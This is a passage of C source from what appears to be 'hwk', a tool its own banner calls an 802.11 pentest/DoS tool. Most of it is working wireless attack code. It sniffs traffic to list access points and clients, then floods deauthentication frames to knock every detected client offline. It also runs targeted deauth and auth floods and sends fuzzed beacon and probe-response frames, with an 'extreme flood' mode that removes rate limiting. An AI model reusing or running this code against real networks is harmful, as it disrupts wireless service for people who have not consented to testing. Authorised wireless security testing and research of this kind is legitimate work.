                    if( rmanage->rpflags.db_signal == 0x01) {
                        clear_line();
                        printf("> ");
                        print_timestamp();
                        printf(" ");
                        print_mac_addr(opts->clmac);
                        printf(" [ %4ddb ]",(int)rmanage->rtap.dbm_signal);
                        printf("\n");
                    }
                }
                
                
            }
        }
        (void)usleep(1);
    }
    
    pkt_recv = NULL;
    free(rmanage);
}


/* just show the incoming packets and parse them to give you a short overview what's running
 * around you. */
void 
show_networks(OPTS_t *opts) 
{
    uint8_t w80211_type = 0;
    struct pcap_pkthdr  hdr;    
    
    RADIOTAP_CONTROL_t *rmanage = radiotap_init();
    const uint8_t     *pkt_recv       = NULL;
    IEEE80211_FCTRL_t *w80211fctrl      = NULL;
    IEEE80211_BEACON_FIXEDPARAM_t *beacon = NULL;
    IEEE80211_DATA_t *data1            = NULL;
    IEEE80211_DATA2_t *data2              = NULL;
    IEEE80211_BEACON_t *w80211mac        = NULL;
    IEEE80211_PROBE_REQUEST_t *preq    = NULL;
    IEEE80211_PROBE_RESPONSE_t *presp    = NULL;
    IEEE80211_ACK_t *ack                  = NULL;
    char *ssid                          = NULL;
    
    uint32_t i    = 0;
    
    uint8_t tag_id  = 0x00;
    uint8_t tag_len = 0x00;
    
    pthread_t perm_hop;
    
    if( opts->channel != 0) {
        if_set_channel(opts->device, opts->channel, opts->sockfd);
    }
    else if( opts->channel == 0) {
        if( pthread_create(&perm_hop, NULL, ch_perm_hop, (void *)opts) != 0) {
            printf("warning: ch_perm_hop thread cannot be started\n");
        }
        printf("> channel hopping activated\n");
    }
    printf("\n"); 
    
    while(TRUE) {
        pkt_recv = (uint8_t *) pcap_next(opts->pcapd, &hdr);
        
        if( pkt_recv != NULL ) {
            if( radiotap_parse(pkt_recv, rmanage) < 0) {
                printf("warning: radiotap parse failed\n");
            }

            w80211fctrl = (IEEE80211_FCTRL_t *)(pkt_recv + radiotap_get_total_length(rmanage));
            w80211_type = (uint8_t)(w80211fctrl->subtype | w80211fctrl->type<<4);

            print_timestamp();
            printf(CDGREY);
            switch(w80211_type) {
                case 0x04:
                    printf(" [PROBE REQUEST]  ");
                    break;
                case 0x05:
                    printf(" [PROBE RESPONSE] ");
                    break;
                case 0x20:
                    printf(" [DATA]  ");
                    break;
                case 0x28:
                    printf(" [QOS DATA] ");
                    break;
                case 0x08:
                    printf(" [BEACON]   ");
                    break;
                case 0x1d:
                    printf(" [ACK]    ");
                    break;
                case 0x24:
                    printf(" [NULL]   \n");
                    break;
                case 0x1c:
                    printf(" [CTS]    \n");
                    break;
                default:
                    printf(" [%02x]   \n",w80211_type);
                    break;
            }
            printf(CRESTORE);
            
            if( w80211_type == IEEE80211_ACK ) {
                ack = (IEEE80211_ACK_t *)(pkt_recv + radiotap_get_total_length(rmanage) + 2);
                printf(" recv: ");
                print_mac_addr(ack->dst);
                printf("\n");
            }
            
            if( w80211_type == IEEE80211_DATA || w80211_type == IEEE80211_QOS_DATA) {
                if( w80211fctrl->to_ds == 1 && w80211fctrl->from_ds == 0 ) {
                    data1 = (IEEE80211_DATA_t *)(pkt_recv + radiotap_get_total_length(rmanage) + 2);
                
                    printf(" bssid=");
                    print_mac_addr(data1->bssid);
                    printf(" src=");
                    print_mac_addr(data1->src);
                    printf(" dst=");
                    print_mac_addr(data1->dst);
                    printf("\t (%d) ",(int)freq2channel(rmanage->rtap.channel));
                    if ( w80211fctrl->protected == 1) {
                        printf(" ENC");
                    }
                    printf(" ToDS\n");      
                }
                else if( w80211fctrl->from_ds == 1 && w80211fctrl->to_ds == 0) {
                    data2 = (IEEE80211_DATA2_t *)(pkt_recv + radiotap_get_total_length(rmanage)  +2);
                    
                    printf(" bssid=");
                    print_mac_addr(data2->bssid);
                    printf(" src=");
                    print_mac_addr(data2->src);
                    printf(" dst=");
                    print_mac_addr(data2->dst);
                    
                    printf("\t (%d) ",(int)freq2channel(rmanage->rtap.channel));
                    if ( w80211fctrl->protected == 1) {
                        printf(" ENC");
                    }
                    printf(" FromDS\n");        
                }
                else {
                    printf("FromDS & ToDS set -> WDS?\n");
                }
                
            }
            else if( w80211_type == IEEE80211_PROBE_REQUEST) {
                preq = (IEEE80211_PROBE_REQUEST_t *)(pkt_recv + radiotap_get_total_length(rmanage) + 2);
                
                printf(" bssid=");
                print_mac_addr(preq->bssid);
                printf(" src=");
                print_mac_addr(preq->src);
                printf(" dst=");
                print_mac_addr(preq->dst);
                
                i = (uint32_t)radiotap_get_total_length(rmanage) + 2 + (uint32_t)sizeof(IEEE80211_PROBE_REQUEST_t);
                while(i < (uint32_t)(hdr.len-4)) {
                    tag_id = pkt_recv[i];
                    tag_len = pkt_recv[i+1];                
                    if(tag_id == IEEE80211_BEACON_TAGGED_SSID) {
                        ssid = calloc(1,(size_t)tag_len);
                        memcpy(ssid,&pkt_recv[i+2],(size_t)tag_len);

                        if ( tag_len > 0) {
                            printf(CDGREY" %s"CRESTORE,ssid);
                            
                        }
                        i += tag_len+2;
                        continue;
                    }
                    else {
                        i += tag_len+2;
                        continue;
                    }
                }
        
                printf("\t (%u) ",freq2channel(rmanage->rtap.channel));
                printf("\n");           
            }
            if( w80211_type == IEEE80211_PROBE_RESPONSE) {
                presp = (IEEE80211_PROBE_RESPONSE_t *)(pkt_recv + radiotap_get_total_length(rmanage) + 2);
                
                printf(" bssid=");
                print_mac_addr(presp->bssid);
                printf(" src=");
                print_mac_addr(presp->src);
                printf(" dst=");
                print_mac_addr(presp->dst);
                
                printf("\t (%d) ",(int)freq2channel(rmanage->rtap.channel));
                printf("\n");       
            }
            
            if( w80211_type == IEEE80211_BEACON) {
                beacon = (IEEE80211_BEACON_FIXEDPARAM_t *)(pkt_recv + radiotap_get_total_length(rmanage) + 2);
                w80211mac = (IEEE80211_BEACON_t *)(pkt_recv + radiotap_get_total_length(rmanage));
                
                printf(" bssid=");
                print_mac_addr(w80211mac->bssid);
                printf(" src=");
                print_mac_addr(w80211mac->src);
                printf(" dst=");
                print_mac_addr(w80211mac->dst);
                
                i = radiotap_get_total_length(rmanage)+sizeof(IEEE80211_MAC_t)+ sizeof(IEEE80211_BEACON_FIXEDPARAM_t);
                while(i < (uint32_t)(hdr.len-4)) {
                    tag_id = pkt_recv[i];
                    tag_len = pkt_recv[i+1];                
                    if(tag_id == IEEE80211_BEACON_TAGGED_SSID) {
                        ssid = calloc(1, tag_len+1);
                        memcpy(ssid,&pkt_recv[i+2],tag_len);

                        printf(" [");
                        printf("\033[37m%s\033[0m",ssid);
                        
                        memset(ssid,0x00,(size_t)tag_len+1);
                        free(ssid);
                        i += tag_len+2;
                        continue;
                    }
                    else if(tag_id == IEEE80211_BEACON_TAGGED_CHANNEL) {
                        printf("|%u]",(uint)pkt_recv[i+2]);
                        i += tag_len+2;
                        continue;
                    }
                    else if(tag_id == 0x30) {
                        printf(" WPA/WPA2");
                        i += tag_len+2;
                        continue;
                    }
                    else {
                        i += tag_len+2;
                        continue;
                    }
                }
                
                printf(" ");
                if( beacon->wep == 0x01) { printf("ENC"); }
                
                printf("\t (%u) ",freq2channel(rmanage->rtap.channel));
                printf("\n");
            }
        }
        (void)usleep(1);
    }
    
    free(rmanage);
    pkt_recv = NULL;
}


/* check if a bssid is already in the BSSID list */
int8_t 
bssid_is_in_list(uint8_t *bssid, bssid_t *first) 
{
    bssid_t *bssid_ptr = first;
                
    while(bssid_ptr) {
        if( memcmp(bssid, bssid_ptr->bssid, 6) == 0) {
            return(0);
        }
        bssid_ptr = bssid_ptr->next;
    }
    
    return(-1);
}


/* check if a bssid as element of the bssid list 
 * already contains the clmac client */
int8_t 
bssid_has_client( uint8_t *clmac, OPTS_t *opts) 
{
    bssid_t *bssid_cli = opts->first_bssid;
    client_t *client   = NULL;
    
    while(bssid_cli) {
        client = bssid_cli->first_client;
        while(client) {
            if( memcmp(client->addr,clmac,6) == 0) {
                return(0);
            }
            client = client->next;
                        
        }
        bssid_cli = bssid_cli->next;
    }
    
    return(-1);
}

void
statistics(OPTS_t *opts)
{
    clear_line();
    printf("\tstatus: [injected: "CDGREY"%u"CRESTORE" | acked: "CDGREY"%u"CRESTORE" | data: "CDGREY"%u"CRESTORE" ]  [ ",
        (uint)opts->pkt_injected,
        (uint)opts->pkt_ack,
        (uint)opts->pkt_data
        
        );
    if( opts->channel_changed == 1) { printf("C "); }
    if( opts->injection_works == -1) { printf("INJ "); }
    if( opts->eX7r3m3_fl00d == 1) { printf("E "); }
    
    printf("]\n");
}

/* since kill, 9 stands for absolutely no tolerance */
void *
mode9_killall(void *arg) 
{
    OPTS_t *opts        = (OPTS_t *)arg;
    uint8_t *packet  = calloc(1, sizeof(IEEE80211_DEAUTH2));
    int32_t inj_success = 0;
    size_t size      = sizeof(IEEE80211_DEAUTH2);
    IEEE80211_DEAUTH_t *deauth = NULL;
    time_t tlast        = time(NULL);
    
    memcpy(packet, IEEE80211_DEAUTH2, sizeof(IEEE80211_DEAUTH2) );

    deauth = (IEEE80211_DEAUTH_t *)(packet + RADIOTAP_PREAMBLE_SIZE + RADIOTAP_RESTRICED_SIZE + 2 );
    deauth->duration = 0x0010;
    
    while(TRUE) {
        bssid_t *bssidd = opts->first_bssid;
        client_t *cli = NULL;
        
        while(bssidd) {
            if_set_channel(opts->device, bssidd->channel, opts->sockfd);
            
            cli = bssidd->first_client;
            while(cli) {
                memcpy(deauth->src,cli->addr,6);
                memcpy(deauth->bssid,bssidd->bssid,6);
                memcpy(deauth->dst,bssidd->bssid,6);
                
                
                deauth->seq = (bssidd->lseq + 1) << 4;
                inj_success = pcap_inject(opts->pcapd, packet, size-1);
        
                deauth->seq = (bssidd->lseq + 2) << 4;
                inj_success = pcap_inject(opts->pcapd, packet, size-1);
        
                opts->pkt_injected += 2;
                
                cli = cli->next;
            }
            bssidd = bssidd->next;
        }
        if( opts->eX7r3m3_fl00d != 1) {
            (void)usleep(50000);
        }
        
        if( (time(NULL) - tlast) > 0) {
            statistics(opts);
            tlast = time(NULL);
        }
        
    }
    
    memset(packet, 0x00, size);
    free(packet);
}


/* catch data packets to gather information of running connections */
void*
mode9_catch_data(void *arg)
{
    OPTS_t *opts            = (OPTS_t *)arg;
    const uint8_t *pkt    = NULL;
    uint8_t w80211_type  = 0;
    uint16_t seq            = 0;
    struct pcap_pkthdr hdr;
    
    IEEE80211_FCTRL_t *w80211fctrl = NULL;
    IEEE80211_DATA_t *data1        = NULL;
    IEEE80211_DATA2_t *data2       = NULL;
    RADIOTAP_CONTROL_t *rctrl      = radiotap_init();
    
    uint8_t *bssid = NULL;
    uint8_t *src   = NULL;
    uint8_t *dst   = NULL;
    
    bssid_t *bssid2 = NULL;
    bssid_t *l_bssid   = NULL;
    bssid_t *new_bssid = NULL;
    client_t *cl       = NULL;
    
    while(TRUE) {
        pkt = (uint8_t *)pcap_next(opts->pcapd,&hdr);
        
        if( pkt != NULL ) {
            opts->pkt_sum++;
            if( radiotap_parse(pkt, rctrl) < 0) {
                printf("warning: rtap parse failed\n");
            }

            w80211fctrl = (IEEE80211_FCTRL_t *)(pkt + radiotap_get_total_length(rctrl));

            w80211_type = (uint8_t)(w80211fctrl->subtype | w80211fctrl->type<<4);
            
            /* ACK packet */
            if( w80211_type == IEEE80211_ACK) {
                opts->pkt_ack++;
            }
            
            /* DATA packet */
            else if( w80211_type == IEEE80211_DATA || w80211_type == IEEE80211_QOS_DATA) {
                opts->pkt_data++;
                if( w80211fctrl->to_ds == 1) {
                    data1 = (IEEE80211_DATA_t *)(pkt + radiotap_get_total_length(rctrl) + 2);
                    
                    dst = data1->dst;
                    src = data1->src;
                    bssid = data1->bssid;
                    seq = data1->seq >> 4;
                    
                }
                else if( w80211fctrl->from_ds == 1 ) {
                    data2 = (IEEE80211_DATA2_t *)(pkt + radiotap_get_total_length(rctrl) + 2);
                    
                    dst = data2->dst;
                    src = data2->src;
                    bssid = data2->bssid;
                    seq = data2->seq >> 4;
                }
                
                
                if( !opts->first_bssid ) {
                    l_bssid = calloc(1, sizeof(bssid_t) );
                    opts->first_bssid = l_bssid;
                    memcpy(l_bssid->bssid, bssid, 6);
                    l_bssid->channel = freq2channel(rctrl->rtap.channel);
                    l_bssid->lseq = seq;
                    
                    opts->last_bssid = l_bssid;
                }
                
                
                /* append bssid */
                if( bssid_is_in_list(bssid, opts->first_bssid) == -1) {

                    new_bssid = calloc(1, sizeof(bssid_t) );
                    memcpy(new_bssid->bssid, bssid, 6);
                    new_bssid->channel = freq2channel(rctrl->rtap.channel);
                    new_bssid->lseq = seq;
                    
                    opts->last_bssid->next = new_bssid;
                
                    
                    opts->last_bssid = new_bssid;
                    
                }
                
                
                
                /* append client */
                bssid2 = opts->first_bssid;
                while(bssid2) {
                    if( memcmp(bssid, bssid2->bssid,6) == 0 && bssid_has_client(src,opts) == -1) {
                        cl = calloc(1, sizeof( client_t) );
                        memcpy(cl->addr,src,6);
                        
                        if( !bssid2->first_client ) {
                            bssid2->first_client = cl;
                            bssid2->last_client = cl;
                        }
                        else {
                            bssid2->last_client->next = cl;
                        }
                        
                    }
                        
                    bssid2 = bssid2->next;
                }
                
                
                /* append dst if not BROADCAST*/
                if( memcmp(dst,MAC_BROADCAST_ADDR,6) != 0) { 
                    bssid2 = opts->first_bssid;
                    while(bssid2) {
                        if( memcmp(bssid, bssid2->bssid,6) == 0 && bssid_has_client(dst,opts) == -1) {
                            cl = calloc(1, sizeof( client_t) );
                            memcpy(cl->addr,dst,6);
                            
                            if( !bssid2->first_client ) {
                                bssid2->first_client = cl;
                                bssid2->last_client = cl;
                            }
                            else {
                                bssid2->last_client->next = cl;
                            }
                            
                        }
                            
                        bssid2 = bssid2->next;
                    }
                }
                
                
            }
        }
        (void)usleep(2);
    }
    
    free(rctrl);
    pkt = NULL;
}

void
print_timestamp()
{
    time_t timestamp = 0;
    struct tm *stm;
    timestamp = time(NULL);
    stm    = localtime(&timestamp);
    
    printf("%02d:%02d:%02d",stm->tm_hour,stm->tm_min,stm->tm_sec);
}

void sig_int(int sig) {
    /* react to SIGINT */
    if( sig != SIGINT) {
        fprintf(stderr,"error: this should never happen\n");
        exit(EXIT_FAILURE);
    }
    
    printf("Ctrl+C pressed, shutting down ...\n");
    exit(EXIT_SUCCESS);
}

uint32_t 
bssid_count_elem(OPTS_t *opts, bssid_t *bssidd)
{
    uint32_t cnt = 0;

    bssidd = opts->first_bssid; 
    while(bssidd) {
        bssidd = bssidd->next;
        cnt++;
    }
    
    return(cnt);
}

int8_t 
attack_deauth(OPTS_t *opts)
{
    pthread_t inject_thrd;
    pthread_t seq;
    
    if( opts_have_bssid(opts) < 0) {
        printf("error: no BSSID set (--bssid)\n");
        exit(EXIT_FAILURE);
    }
    if( opts_have_clmac(opts) < 0 ) {
        printf("error: no client mac set (--client)\n");
        exit(EXIT_FAILURE);
    }
    
    printf("\n");
            /* determine the channel etc */
    if( opts->channel == 0) {
        opts->channel = get_channel(opts);
        if( opts->channel < 0 ) {
            fprintf(stderr,"err: no such BSSID found\n");
            exit(EXIT_FAILURE);
        }
    }
    else {
        if_set_channel(opts->device, opts->channel, opts->sockfd);
    }
    
    printf("\tchannel: %d\n",(int)opts->channel);
    if( opts->ssid == NULL ) {
        printf("\tssid: not initialized\n");
    }
    else {
        printf("\tssid: %s\n",opts->ssid);
    }
    
    printf("\n");
    
    printf("> waiting for beacon frame ...\n");
    if( get_beacon(opts) == -1 ) {
        clear_line();
        printf("> waiting for beacon frame ... not captured\n");
    }
    else {
        clear_line();
        printf("> waiting for beacon frame ... caught\n");
    }
    
    if_set_channel(opts->device, opts->channel, opts->sockfd);
    
    printf("> testing injection ... \n");
    opts->injection_works = test_inject(opts);
    if ( opts->injection_works > -1 ) {
        clear_line();
        printf("> testing injection ... works ");
        if( opts->injection_works == 0) {
            printf("[PROBE RESPONSE 0x05]\n");
        }
        else if (opts->injection_works == 1) {
            printf("[ACK 0x1d]\n");
        }
        else {
            printf("\n");
        }
    }
    else {
        clear_line();
        printf("> testing injection ... failed (out of range? wrong channel set?)\n");
    }
    
    if( pthread_create(&seq, NULL, seqalyzer, (void *)opts) != 0 ) {
        printf("warning: seq analyzer thread could not be started\n");
    }
    
    printf("> launching deauth flood\n");
    if( pthread_create(&inject_thrd, NULL, inject_deauth, (void *)opts) != 0) {
        printf("warning: injection thread could no be started\n");
    }
    
    printf("\n\n");
    while(TRUE) { 
        clear_line();
        printf("\tstatus: %u injected | ACK:%u | seq: %u | data: %u  [ ",(uint)opts->pkt_injected, (uint)opts->pkt_ack,(uint)opts->current_seq,(uint)opts->pkt_data);
        if( opts->channel_changed == 1) { printf("C "); }
        if( opts->injection_works == -1) { printf("INJ "); }
        if( opts->eX7r3m3_fl00d == 1) { printf("E "); }
        printf("]\n");
        (void)sleep(1);
    }
}

int8_t 
attack_all(OPTS_t *opts)
{
/* deauth all */

    bssid_t *bssidd  = NULL;
    client_t *cli      = NULL;
    
    pthread_t catch_data;
    pthread_t perm_hop;
        
        
    if( opts->channel == 0) {
        if( pthread_create(&perm_hop, NULL, ch_perm_hop, (void *)opts) != 0) {
            printf("warning: channel hopping thread could not be started\n");
        }
        printf("\t# channel hopping activated\n");
    }
    else {
        if_set_channel(opts->device,opts->channel, opts->sockfd);
    }
    
    printf("\tscanning %u sec for active networks (DATAs) ... \n",(uint)opts->twait);
    
    if( pthread_create(&catch_data, NULL, mode9_catch_data, (void *)opts) != 0) {
        printf("warning: data catching thread could not be started\n");
    }
    
    (void)sleep((uint)opts->twait);
    
    clear_line();
    printf("\tscanning %u sec for active networks (DATAs) ... done\n",(uint)opts->twait);
    
    if( opts->channel == 0) {
        if( pthread_cancel(perm_hop) != 0) {
            printf("warning: permanent channel hopping thread cancel failed\n");
        }
    }
            
    printf("> Detected connections: \n");
    
    if( bssid_count_elem(opts,bssidd) == 0) {
        printf("error: no data connections detected (you may increase -t or specify a channel)\n");
        exit(EXIT_FAILURE);
    }
    
    bssidd = opts->first_bssid;
    while(bssidd) {
        printf("\tBSSID: ");
        print_mac_addr(bssidd->bssid);
        printf(" CLIENTS: ");
        
        cli = bssidd->first_client;
        while(cli) {
            print_mac_addr(cli->addr);
            printf(" ");
            cli = cli->next;
        }
            
        printf(" ch=%d seq=%d\n",(int)bssidd->channel,(int)bssidd->lseq);
        bssidd = bssidd->next;
    }
    
    printf("> starting injection\n\n\n");
    
    (void)mode9_killall(opts);
        
    return(0);
}

int8_t
attack_auth(OPTS_t *opts)
{
    pthread_t inject_thrd;
    pthread_t seq;

    /* required opts present? */    
    if( opts_have_bssid(opts) < 0) {
        exit_err("error: no BSSID set (--bssid)");
    }
    if( opts_have_clmac(opts) < 0 ) {
        exit_err("error: no client set (--client)");
    }
    
    printf("\n");   
    /* determine the channel etc */
    if( opts->channel == 0) {
        opts->channel = get_channel(opts);
        if( opts->channel < 0 ) {
            fprintf(stderr,"err: no such BSSID found\n");
            exit(EXIT_FAILURE);
        }
    }
    else {
        if_set_channel(opts->device, opts->channel, opts->sockfd);
    }
    
    printf("\tchannel: %d\n",(int)opts->channel);
    if( opts->ssid == NULL ) {
            printf("\tssid: not initialized\n");
    }
    else {
        printf("\tssid: %s\n",opts->ssid);
    }
    
    printf("\n");
    
    printf("> waiting for beacon frame ...\n");
    if( get_beacon(opts) == -1 ) {
        clear_line();
        printf("> waiting for beacon frame ... not captured\n");
    }
    else {
        clear_line();
        printf("> waiting for beacon frame ... caught\n");
    }
        
    if_set_channel(opts->device, opts->channel, opts->sockfd);
        
    printf("> testing injection ... \n");
    opts->injection_works = test_inject(opts);
    if ( opts->injection_works > -1 ) {
        clear_line();
        printf("> testing injection ... works ");
        if( opts->injection_works == 0) {
            printf("[PROBE RESPONSE 0x05]\n");
        }
        else if (opts->injection_works == 1) {
            printf("[ACK 0x1d]\n");
        }
        else {
            printf("\n");
        }
    }
    else {
        clear_line();
        printf("> testing injection ... failed (out of range? wrong channel set?)\n");
    }
        
    if( pthread_create(&seq, NULL, seqalyzer, (void *)opts) != 0 ) {
        printf("warning: seq analyzer thread could not be started\n");
    }
        
    printf("> launching auth flood\n");
    if( pthread_create(&inject_thrd, NULL, inject_auth, (void *)opts) != 0) {
        printf("warning: injection thread can't be started");
    }   
    printf("\n\n");
    
    while(TRUE) { 
        clear_line();

        printf("\tstatus: %u injected | ACK:%u | seq: %u | data: %u  [ ",(uint)opts->pkt_injected, (uint)opts->pkt_ack,(uint)opts->current_seq,(uint)opts->pkt_data);
        if( opts->channel_changed == 1) { printf("C "); }
        if( opts->injection_works == -1) { printf("INJ "); }
        if( opts->eX7r3m3_fl00d == 1) { printf("E "); }
        printf("]\n");
        (void)sleep(1);
    }
    
    return(0);
}

int8_t 
attack_test_inject(OPTS_t *opts)
{
    uint8_t ch = 0;
    
    printf(" injection testing\n");
    
    if( opts->channel != 0) {
        printf("\tchannel %u : ...\n",opts->channel);
        if_set_channel(opts->device,opts->channel, opts->sockfd);
        
        if( test_inject(opts) < 0) {
            clear_line();
            printf("\tchannel %u : failed\n",opts->channel);
            return(-1);
        }
        else {
            clear_line();
            printf("\tchannel %u : works\n",opts->channel);
            return(0);
        }
    }
    else {
        printf("\ttesting on all channels\n");
        for(ch = 0; ch < sizeof(channels); ch++) {
            printf("\tchannel %u : ...\n",channels[ch]);
            opts->channel = channels[ch];
            if_set_channel(opts->device,channels[ch], opts->sockfd);
            
            if( test_inject(opts) < 0) {
                clear_line();
                printf("\tchannel %u : failed\n",channels[ch]);
            }
            else {
                clear_line();
                printf("\tchannel %u : works\n",channels[ch]);
            }
        }
    }
    
    
    return(0);
}

int8_t 
attack_proberesponse(OPTS_t *opts)
{
    uint8_t *packet                = calloc(1, 2000);
    uint16_t pos                      = 0;
    uint8_t c                        = 0; /* opts count */
    uint8_t d                        = 0;
    uint8_t r_id                      = 0;
    uint8_t r_len                    = 0;
    uint8_t r_tags                  = 0;
    uint32_t msg_too_long            = 0;
    int32_t pinj                      = 0;
    time_t tlast                      = time(NULL);
    int32_t total                    = 0;
    IEEE80211_PROBE_RESPONSE_t *presp = NULL;
    presp                            = NULL;
    
    
    if( opts->channel == 0) {
        exit_err("error: need a channel");
    }
    
    memcpy(packet,IEEE80211_PRRESP,sizeof(IEEE80211_PRRESP)-1);
    
    presp = (IEEE80211_PROBE_RESPONSE_t *)&packet[RADIOTAP_RESTRICED_SIZE + RADIOTAP_PREAMBLE_SIZE + 2];
    
        
    if( opts_have_dstmac(opts) < 0) {
        exit_err("error: no dst mac given");
    }
    
    
    /* clmac */
    if( opts_have_clmac(opts) == 0) {
        printf("> clmac ___________ ");
        print_mac_addr(opts->clmac);
        printf("\n");
        memcpy(presp->src, opts->clmac,6);
    }
    else {
        printf("> clmac ___________ set to fake addr\n");
        memcpy(presp->src, opts->mac_fake_addr,6);
    }
    
    /* bssid */
    if( opts_have_bssid(opts) == 0) {
        printf("> bssid ___________ ");
        print_mac_addr(opts->bssid);
        printf("\n");
        memcpy(presp->bssid, opts->bssid, 6);
    }
    else {
        memcpy(presp->bssid, MAC_BROADCAST_ADDR, 6);
        printf("> bssid ___________ BROADCAST\n");
    }
    
    /* dstmac */
    memcpy(presp->dst,  opts->dstmac,6);
    printf("> dest ____________ ");
    print_mac_addr(opts->dstmac);
    printf("\n");

    
    if_set_channel(opts->device,opts->channel, opts->sockfd);
    
    printf("\n\n");

    while(TRUE) {
        pos = sizeof(IEEE80211_PRRESP);
        memset(&packet[pos],0x00,2000 -  sizeof(IEEE80211_PRRESP));
        r_tags        = (uint8_t )rand() % 10;
        presp->seq    = (uint16_t)rand() % 4095 << 4;
        presp->duration = (uint16_t)rand() % 1000;
        
        for(c = 0; c < r_tags; c++) {
            r_len = (uint8_t)rand() % 180;    /* len */
            r_id =  (uint8_t)rand() % 255;
            
            packet[pos] = r_id;              /* id  */
            packet[pos + 1] = r_len;            /* len */
            for(d = 2; d < r_len; d++) {
                memset(&packet[pos + d], rand() % 255, 1);
            }
            pos += r_len + 2;
        }
        
        pinj = pcap_inject(opts->pcapd,packet,pos);
        total++;
        if( pinj == -1) {
            msg_too_long++;
        }
        
        if( (time(NULL) - tlast) > 0) {
            clear_line();   
            printf("\t");
            print_timestamp();
            printf("\t[err:%u | total %d | len %4u | prams %2u]\n",msg_too_long,total,pos,c);
            tlast = time(NULL);
        }
        
        if( opts->eX7r3m3_fl00d != 1) {
            usleep(PACKET_TIMEOUT);
        }

    }

    return(0);
}

int8_t 
attack_beacon_flood(OPTS_t *opts)
{
    IEEE80211_BEACON_t *beacon = NULL;
    uint8_t *pkt               = NULL;
    uint8_t *beacon_ssid_ext   = NULL;
    time_t   tlast           = time(NULL);
    
    
    uint16_t pos                      = 0;
    uint8_t c                        = 0; /* opts count */
    uint8_t d                        = 0;
    uint8_t r_len                    = 0;
    uint8_t r_id                      = 0;
    uint8_t r_tags                  = 0;
    uint32_t msg_too_long            = 0;
    int32_t pinj                      = 0;
    int32_t total                    = 0;
    
    if( opts->channel == 0) {
        printf("error: no channel set\n");
        exit(EXIT_FAILURE);
    }
    
    pkt = calloc(1,2000);
    
    memcpy(pkt, IEEE80211_BEACON_MOD, sizeof(IEEE80211_BEACON_MOD));
    
    beacon = (IEEE80211_BEACON_t *)&pkt[ RADIOTAP_RESTRICED_SIZE + RADIOTAP_PREAMBLE_SIZE-1];
    
    if( opts_have_bssid(opts) == 0) {
        memcpy(beacon->bssid,opts->bssid, 6);
        printf("> bssid ___________ ");
        print_mac_addr(opts->bssid);
        printf("\n");
    }
    else {
        exit_err("error: bssid not set");
    }
    
    if( opts_have_clmac(opts) == 0) {
        memcpy(beacon->src,opts->clmac, 6);
        printf("> clmac ___________ ");
        print_mac_addr(opts->clmac);
        printf("\n");
    }
    else {
        memcpy(beacon->src, opts->bssid, 6);
        printf("> clmac ___________ BSSID\n");
    }
    
    if( opts_have_dstmac(opts) == 0) {
        if( memcmp(beacon->dst, beacon->bssid, 6) == 0) {
            memcpy(beacon->dst,opts->dstmac, 6);
            printf("> dstmac __________ ");
            print_mac_addr(beacon->dst);
            printf("\n");
        }
        else {
            memcpy(beacon->dst,MAC_BROADCAST_ADDR, 6);
            printf("> dstmac __________ BROADCAST\n");  
        }
    }
    else {
        memcpy(beacon->dst,MAC_BROADCAST_ADDR, 6);
        printf("> dstmac __________ BROADCAST\n");
    }
    
    
    
    printf("> starting beacon fuzzing\n\n\n");
    
    while(TRUE) {
        pos = sizeof(IEEE80211_BEACON_t) + RADIOTAP_RESTRICED_SIZE + RADIOTAP_PREAMBLE_SIZE +12 -1 ;
        memset(&pkt[pos],0x00,2000 - ( sizeof(IEEE80211_BEACON_t) + RADIOTAP_RESTRICED_SIZE + RADIOTAP_PREAMBLE_SIZE + 12 -1));
        r_tags          = (uint8_t )rand() % 10;
        beacon->seq     = (uint16_t)rand() % 4095 << 4;
        beacon->drtn    = (uint16_t)rand() % 1000;
        
        for(c = 0; c < r_tags; c++) {
            r_len = (uint8_t)rand() % 180;   
            r_id =  (uint8_t)rand() % 255;
            
            pkt[pos] = r_id;               
            pkt[pos + 1] = r_len;          
            for(d = 2; d < r_len; d++) {
                memset(&pkt[pos + d], rand() % 255, 1);
            }
            pos += r_len + 2;
        }
        
        pinj = pcap_inject(opts->pcapd,pkt,pos);
        total++;
        if( pinj == -1) {
            msg_too_long++;
        }
        
        if( (time(NULL) - tlast) > 0) {
            clear_line();   
            printf("\t");
            print_timestamp();
            printf("\t[err:%u | total %d | len %4u | prams %2u]\n",msg_too_long,total,pos,c);
            tlast = time(NULL);
        }
        
        if( opts->eX7r3m3_fl00d != 1) {
            usleep(PACKET_TIMEOUT);
        }

    }

    
    printf("\n");
        
    free(pkt);
    free(beacon_ssid_ext);
    return(0);
}

    
void sig_usr1(int sig) {
    printf("\n\n\n"
        "                      |||||\n"
        "                      (0-0)\n"
        "  .~~~~~~~~~~~~~~~~ooO~~(_)~~~~~~~~~~~~~~~~~~~~~~~~~.\n"
        "  | Speaking the Truth in times of universal deceit |\n"
        "  | is a revolutionary act          - George Orwell |\n"
        "  '~~~~~~~~~~~~~~~~~~~~~~~~~~~ooO~~~~~~~~~~~~~~~~~~~'\n"
        "                     |__|__|\n"
        "                      || ||\n"
        "                     ooO Ooo     [%d]\n\n",sig);
}


void 
print_banner(void)
{
    /* nice ascii art, isn't it?  (woooooow, it's colored!!!!)*/

    printf("\n"
        "\t"CLGREEN"               "CLGREY"  __                      __   "CDGREEN"\n"
        "\t"CLGREEN"________"CLGREY"\t|  |__  _____  __  _  __|  | __        "CLGREEN"________\n"
        "\t"CLGREEN"______  "CLGREY"\t|  |  \\ \\__  \\ \\ \\/ \\/ /|  |/ /          "CLGREEN"______\n"
        "\t"CLGREEN"______  "CLGREY"\t|   Y  \\ / __ \\_\\     / |    <           "CLGREEN"______\n"
        "\t"CLGREEN"________"CLGREY"\t|___|  /(____  / \\/\\_/  |__|_ \\        "CLGREEN"________\n"
        "\t"CDGREEN"                     "CLGREY"\\/"CDGREEN"      "CLGREY"\\/"CDGREEN"\n"
        CLGREY"\t\t   _________________________________________\n"
        CLGREY"\t\t  [_802.11_pentest/DoS______nullsec|atzeton_]"CRESTORE
        "\n\n"
    );  
    
    /* print out some information */
    printf("> running "CLGREY"[hwk "VERSION" '"CODENAME"']"CRESTORE" [ uid=%d | pid=%d ]   [",getuid(),getpid());
    print_timestamp();
    printf("]\n");
    printf("> check out "CDRED"http://nullsecurity.net"CRESTORE"\n");
}


void
attack_start(OPTS_t *opts)
{
    /* starting the attacks */
    
    if( opts->mode == HWK_MODE_BEACON ) {
        printf("<beacon flood>\n");
        attack_beacon_flood(opts);
        exit(EXIT_SUCCESS);
    }
    else if( opts->mode == HWK_MODE_FUZZPROBES) {
        printf("<probe response fuzzing>\n");
        attack_proberesponse(opts);
        exit(EXIT_SUCCESS);
    }
